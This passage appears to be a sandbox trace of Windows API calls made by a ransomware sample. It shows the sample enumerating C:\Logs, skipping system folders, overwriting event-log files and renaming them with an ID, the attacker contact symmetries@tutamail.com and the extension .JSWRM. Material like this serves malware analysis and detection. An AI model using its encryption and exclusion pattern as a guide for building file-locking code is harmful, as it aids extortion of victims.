| out: hHeap=0x1e0000) returned 1 [0065.568] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f87c0 | out: hHeap=0x1e0000) returned 1 [0065.568] MoveFileW (lpExistingFileName="C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-devicesetupmanager%4operational.evtx"), lpNewFileName="C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Operational.evtx.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\logs\\microsoft-windows-devicesetupmanager%4operational.evtx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0065.569] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0065.569] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224ee8 | out: hHeap=0x1e0000) returned 1 [0065.569] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225328 | out: hHeap=0x1e0000) returned 1 [0065.569] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e418 | out: hHeap=0x1e0000) returned 1 [0065.569] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e268 | out: hHeap=0x1e0000) returned 1 [0065.569] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345f6c8 | out: lpFindFileData=0x345f6c8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc967f17e, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xc967f17e, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-Dhcp-Client%4Admin.evtx", cAlternateFileName="MI8270~1.EVT")) returned 1 [0065.569] lstrcmpiW (lpString1="Microsoft-Windows-Dhcp-Client%4Admin.evtx", lpString2=".") returned 1 [0065.569] lstrcmpiW (lpString1="Microsoft-Windows-Dhcp-Client%4Admin.evtx", lpString2="..") returned 1 [0065.569] lstrcmpiW (lpString1="Microsoft-Windows-Dhcp-Client%4Admin.evtx", lpString2="...") returned 1 [0065.569] lstrcmpiW (lpString1="Microsoft-Windows-Dhcp-Client%4Admin.evtx", lpString2="windows") returned -1 [0065.569] lstrcmpiW (lpString1="Microsoft-Windows-Dhcp-Client%4Admin.evtx", lpString2="recovery") returned -1 [0065.569] lstrcmpiW (lpString1="Microsoft-Windows-Dhcp-Client%4Admin.evtx", lpString2="perflogs") returned -1 [0065.569] lstrcmpiW (lpString1="Microsoft-Windows-Dhcp-Client%4Admin.evtx", lpString2="documents and settings") returned 1 [0065.569] lstrcmpiW (lpString1="Microsoft-Windows-Dhcp-Client%4Admin.evtx", lpString2="$RECYCLE.BIN") returned 1 [0065.569] lstrcmpiW (lpString1="Microsoft-Windows-Dhcp-Client%4Admin.evtx", lpString2="system volume information") returned -1 [0065.569] lstrcmpiW (lpString1="Microsoft-Windows-Dhcp-Client%4Admin.evtx", lpString2="msocache") returned -1 [0065.569] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232e88 [0065.569] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-Dhcp-Client%4Admin.evtx", cchWideChar=41, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 41 [0065.569] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0065.570] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-Dhcp-Client%4Admin.evtx", cchWideChar=41, lpMultiByteStr=0x1f84e8, cbMultiByte=41, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft-Windows-Dhcp-Client%4Admin.evtx", lpUsedDefaultChar=0x0) returned 41 [0065.570] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232e88 | out: hHeap=0x1e0000) returned 1 [0065.570] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232fc0 [0065.570] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-Dhcp-Client%4Admin.evtx", cchWideChar=41, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 41 [0065.570] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f87c0 [0065.570] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-Dhcp-Client%4Admin.evtx", cchWideChar=41, lpMultiByteStr=0x1f87c0, cbMultiByte=41, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft-Windows-Dhcp-Client%4Admin.evtx", lpUsedDefaultChar=0x0) returned 41 [0065.570] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232fc0 | out: hHeap=0x1e0000) returned 1 [0065.570] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209530 [0065.570] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225548 | out: hHeap=0x1e0000) returned 1 [0065.570] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0065.570] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f69c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0065.570] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2091e8 [0065.570] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Dhcp-Client%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-dhcp-client%4admin.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x450 [0065.570] GetFileSizeEx (in: hFile=0x450, lpFileSize=0x345f630 | out: lpFileSize=0x345f630*=69632) returned 1 [0065.570] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0065.570] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11000) returned 0x2481b0 [0065.570] ReadFile (in: hFile=0x450, lpBuffer=0x2481b0, nNumberOfBytesToRead=0x11000, lpNumberOfBytesRead=0x345f63c, lpOverlapped=0x0 | out: lpBuffer=0x2481b0*, lpNumberOfBytesRead=0x345f63c*=0x11000, lpOverlapped=0x0) returned 1 [0065.576] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0065.577] WriteFile (in: hFile=0x450, lpBuffer=0x2481b0*, nNumberOfBytesToWrite=0x11000, lpNumberOfBytesWritten=0x345f638, lpOverlapped=0x0 | out: lpBuffer=0x2481b0*, lpNumberOfBytesWritten=0x345f638*=0x11000, lpOverlapped=0x0) returned 1 [0065.577] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2481b0 | out: hHeap=0x1e0000) returned 1 [0065.577] CloseHandle (hObject=0x450) returned 1 [0065.578] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2093c8 [0065.578] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0065.578] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8638 [0065.578] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8638, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0065.578] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8670 [0065.578] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8638 | out: hHeap=0x1e0000) returned 1 [0065.579] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0065.579] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3c0 [0065.579] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3c0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0065.579] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3c0 | out: hHeap=0x1e0000) returned 1 [0065.579] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209710 [0065.579] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa6) returned 0x2175c0 [0065.579] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209710 | out: hHeap=0x1e0000) returned 1 [0065.579] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xf8) returned 0x20e550 [0065.579] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2175c0 | out: hHeap=0x1e0000) returned 1 [0065.579] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8670 | out: hHeap=0x1e0000) returned 1 [0065.579] MoveFileW (lpExistingFileName="C:\\Logs\\Microsoft-Windows-Dhcp-Client%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-dhcp-client%4admin.evtx"), lpNewFileName="C:\\Logs\\Microsoft-Windows-Dhcp-Client%4Admin.evtx.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\logs\\microsoft-windows-dhcp-client%4admin.evtx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0065.580] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e550 | out: hHeap=0x1e0000) returned 1 [0065.580] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2093c8 | out: hHeap=0x1e0000) returned 1 [0065.580] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2091e8 | out: hHeap=0x1e0000) returned 1 [0065.580] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f87c0 | out: hHeap=0x1e0000) returned 1 [0065.580] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0065.580] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345f6c8 | out: lpFindFileData=0x345f6c8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc96cb64b, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xc96cb64b, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-Dhcpv6-Client%4Admin.evtx", cAlternateFileName="MIEBFF~1.EVT")) returned 1 [0065.580] lstrcmpiW (lpString1="Microsoft-Windows-Dhcpv6-Client%4Admin.evtx", lpString2=".") returned 1 [0065.580] lstrcmpiW (lpString1="Microsoft-Windows-Dhcpv6-Client%4Admin.evtx", lpString2="..") returned 1 [0065.580] lstrcmpiW (lpString1="Microsoft-Windows-Dhcpv6-Client%4Admin.evtx", lpString2="...") returned 1 [0065.580] lstrcmpiW (lpString1="Microsoft-Windows-Dhcpv6-Client%4Admin.evtx", lpString2="windows") returned -1 [0065.580] lstrcmpiW (lpString1="Microsoft-Windows-Dhcpv6-Client%4Admin.evtx", lpString2="recovery") returned -1 [0065.580] lstrcmpiW (lpString1="Microsoft-Windows-Dhcpv6-Client%4Admin.evtx", lpString2="perflogs") returned -1 [0065.580] lstrcmpiW (lpString1="Microsoft-Windows-Dhcpv6-Client%4Admin.evtx", lpString2="documents and settings") returned 1 [0065.580] lstrcmpiW (lpString1="Microsoft-Windows-Dhcpv6-Client%4Admin.evtx", lpString2="$RECYCLE.BIN") returned 1 [0065.580] lstrcmpiW (lpString1="Microsoft-Windows-Dhcpv6-Client%4Admin.evtx", lpString2="system volume information") returned -1 [0065.580] lstrcmpiW (lpString1="Microsoft-Windows-Dhcpv6-Client%4Admin.evtx", lpString2="msocache") returned -1 [0065.580] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232ae0 [0065.580] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-Dhcpv6-Client%4Admin.evtx", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0065.580] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f87c0 [0065.580] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-Dhcpv6-Client%4Admin.evtx", cchWideChar=43, lpMultiByteStr=0x1f87c0, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft-Windows-Dhcpv6-Client%4Admin.evtx", lpUsedDefaultChar=0x0) returned 43 [0065.580] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232ae0 | out: hHeap=0x1e0000) returned 1 [0065.580] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232c18 [0065.580] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-Dhcpv6-Client%4Admin.evtx", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0065.580] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0065.580] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-Dhcpv6-Client%4Admin.evtx", cchWideChar=43, lpMultiByteStr=0x1f8328, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft-Windows-Dhcpv6-Client%4Admin.evtx", lpUsedDefaultChar=0x0) returned 43 [0065.581] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232c18 | out: hHeap=0x1e0000) returned 1 [0065.581] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2093c8 [0065.581] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209530 | out: hHeap=0x1e0000) returned 1 [0065.581] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0065.581] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f69c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0065.581] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209530 [0065.581] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Dhcpv6-Client%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-dhcpv6-client%4admin.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x450 [0065.581] GetFileSizeEx (in: hFile=0x450, lpFileSize=0x345f630 | out: lpFileSize=0x345f630*=69632) returned 1 [0065.581] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0065.581] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11000) returned 0x2481b0 [0065.581] ReadFile (in: hFile=0x450, lpBuffer=0x2481b0, nNumberOfBytesToRead=0x11000, lpNumberOfBytesRead=0x345f63c, lpOverlapped=0x0 | out: lpBuffer=0x2481b0*, lpNumberOfBytesRead=0x345f63c*=0x11000, lpOverlapped=0x0) returned 1 [0065.589] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0065.589] WriteFile (in: hFile=0x450, lpBuffer=0x2481b0*, nNumberOfBytesToWrite=0x11000, lpNumberOfBytesWritten=0x345f638, lpOverlapped=0x0 | out: lpBuffer=0x2481b0*, lpNumberOfBytesWritten=0x345f638*=0x11000, lpOverlapped=0x0) returned 1 [0065.589] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2481b0 | out: hHeap=0x1e0000) returned 1 [0065.589] CloseHandle (hObject=0x450) returned 1 [0065.590] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2092d8 [0065.590] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0065.590] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0065.591] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f84e8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0065.591] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8638 [0065.591] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0065.591] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0065.591] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a288 [0065.591] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a288, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0065.591] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a288 | out: hHeap=0x1e0000) returned 1 [0065.591] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224d50 [0065.591] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0065.591] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224d50 | out: hHeap=0x1e0000) returned 1 [0065.591] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11c) returned 0x23ecb8 [0065.591] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0065.591] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8638 | out: hHeap=0x1e0000) returned 1 [0065.591] MoveFileW (lpExistingFileName="C:\\Logs\\Microsoft-Windows-Dhcpv6-Client%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-dhcpv6-client%4admin.evtx"), lpNewFileName="C:\\Logs\\Microsoft-Windows-Dhcpv6-Client%4Admin.evtx.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\logs\\microsoft-windows-dhcpv6-client%4admin.evtx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0065.592] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ecb8 | out: hHeap=0x1e0000) returned 1 [0065.592] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2092d8 | out: hHeap=0x1e0000) returned 1 [0065.592] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209530 | out: hHeap=0x1e0000) returned 1 [0065.592] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0065.592] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f87c0 | out: hHeap=0x1e0000) returned 1 [0065.592] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345f6c8 | out: lpFindFileData=0x345f6c8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca64aa7b, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xca64aa7b, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-Diagnosis-DPS%4Operational.evtx", cAlternateFileName="MI9F85~1.EVT")) returned 1 [0065.592] lstrcmpiW (lpString1="Microsoft-Windows-Diagnosis-DPS%4Operational.evtx", lpString2=".") returned 1 [0065.592] lstrcmpiW (lpString1="Microsoft-Windows-Diagnosis-DPS%4Operational.evtx", lpString2="..") returned 1 [0065.592] lstrcmpiW (lpString1="Microsoft-Windows-Diagnosis-DPS%4Operational.evtx", lpString2="...") returned 1 [0065.592] lstrcmpiW (lpString1="Microsoft-Windows-Diagnosis-DPS%4Operational.evtx", lpString2="windows") returned -1 [0065.592] lstrcmpiW (lpString1="Microsoft-Windows-Diagnosis-DPS%4Operational.evtx", lpString2="recovery") returned -1 [0065.592] lstrcmpiW (lpString1="Microsoft-Windows-Diagnosis-DPS%4Operational.evtx", lpString2="perflogs") returned -1 [0065.592] lstrcmpiW (lpString1="Microsoft-Windows-Diagnosis-DPS%4Operational.evtx", lpString2="documents and settings") returned 1 [0065.592] lstrcmpiW (lpString1="Microsoft-Windows-Diagnosis-DPS%4Operational.evtx", lpString2="$RECYCLE.BIN") returned 1 [0065.592] lstrcmpiW (lpString1="Microsoft-Windows-Diagnosis-DPS%4Operational.evtx", lpString2="system volume information") returned -1 [0065.592] lstrcmpiW (lpString1="Microsoft-Windows-Diagnosis-DPS%4Operational.evtx", lpString2="msocache") returned -1 [0065.592] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2094b8 [0065.592] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-Diagnosis-DPS%4Operational.evtx", cchWideChar=49, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 49 [0065.592] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20de78 [0065.592] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-Diagnosis-DPS%4Operational.evtx", cchWideChar=49, lpMultiByteStr=0x20de78, cbMultiByte=49, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft-Windows-Diagnosis-DPS%4Operational.evtx", lpUsedDefaultChar=0x0) returned 49 [0065.592] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2094b8 | out: hHeap=0x1e0000) returned 1 [0065.592] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209620 [0065.592] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-Diagnosis-DPS%4Operational.evtx", cchWideChar=49, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 49 [0065.592] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e418 [0065.592] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-Diagnosis-DPS%4Operational.evtx", cchWideChar=49, lpMultiByteStr=0x20e418, cbMultiByte=49, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft-Windows-Diagnosis-DPS%4Operational.evtx", lpUsedDefaultChar=0x0) returned 49 [0065.592] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209620 | out: hHeap=0x1e0000) returned 1 [0065.592] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225080 [0065.592] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2093c8 | out: hHeap=0x1e0000) returned 1 [0065.592] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0065.592] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f69c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0065.592] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224aa8 [0065.593] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Diagnosis-DPS%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-diagnosis-dps%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x450 [0065.595] GetFileSizeEx (in: hFile=0x450, lpFileSize=0x345f630 | out: lpFileSize=0x345f630*=69632) returned 1 [0065.595] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0065.595] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11000) returned 0x2481b0 [0065.595] ReadFile (in: hFile=0x450, lpBuffer=0x2481b0, nNumberOfBytesToRead=0x11000, lpNumberOfBytesRead=0x345f63c, lpOverlapped=0x0 | out: lpBuffer=0x2481b0*, lpNumberOfBytesRead=0x345f63c*=0x11000, lpOverlapped=0x0) returned 1 [0065.600] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0065.600] WriteFile (in: hFile=0x450, lpBuffer=0x2481b0*, nNumberOfBytesToWrite=0x11000, lpNumberOfBytesWritten=0x345f638, lpOverlapped=0x0 | out: lpBuffer=0x2481b0*, lpNumberOfBytesWritten=0x345f638*=0x11000, lpOverlapped=0x0) returned 1 [0065.600] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2481b0 | out: hHeap=0x1e0000) returned 1 [0065.600] CloseHandle (hObject=0x450) returned 1 [0065.602] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224f70 [0065.602] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0065.602] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0065.602] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, 